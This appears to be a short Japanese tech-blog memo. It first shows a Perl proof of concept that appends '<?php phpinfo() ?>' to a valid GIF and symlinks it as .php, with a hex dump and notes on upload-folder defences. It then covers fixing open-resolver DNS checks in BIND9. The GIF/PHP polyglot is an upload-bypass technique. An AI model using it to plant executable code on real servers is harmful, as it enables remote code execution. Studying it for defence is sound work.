gifにphpをしこむ
ということで
これを参考に実験 ってこれはPoC公開?
use GD; my $img = new GD::Image(1,1); my $white = $img->colorAllocate(255,255,255); $img->transparent($white); binmode STDOUT; print $img->gif; print '<?php phpinfo() ?>';
これをファイルなり CGIなりで 1.gifを抽出
% ln -s 1.gif 1.php % file 1.gif 1.gif: GIF image data, version 89a, 1 x 1 % file 1.php 1.php: symbolic link to 1.gif
して
00000000 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff |GIF89a..........| 00000010 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 |...!.......,....| 00000020 01 00 01 00 00 02 02 44 01 00 3b 3c 3f 70 68 70 |.......D..;| 0000003f
こんなかんぢ
WebServerは
- ファイルの中身チェック
- 拡張子チェック
- Uploadフォルダを直接見せない or Uploadフォルダでphpを許可しない
等が必要?
DNS AMP Checkと格闘(w
- http://www.e-ontap.com/internet/check/
- キャッシュを返答してしまう(google.com の NS)
- ルートを返答してしまう(. の NS)
を実験
要はキャッシュを追い出せばOK
- キャッシュはlocalも外で提供されているキャッシュサーバに変更
- apacheは再起動しないと握ったままらしい
- ルートは BIND9ではnamed.confから消すだけではだめ
- hintにtouch した named.usorootを読ませる?ではだめで
- /dev/nullにしないと!#追記
- http://jprs.jp/tech/notice/2006-03-29-dns-cache-server.html
自分で別にキャッシュを持たないとエロいとこ見に行ってるとか漏洩するんだよね〜
って言う人は viewで コンテンツとキャッシュと分けてみる?
インターネットと管理
個々のネットワークが管理されていない→全体の乱れ
全体を管理しようとしても…アレだよね?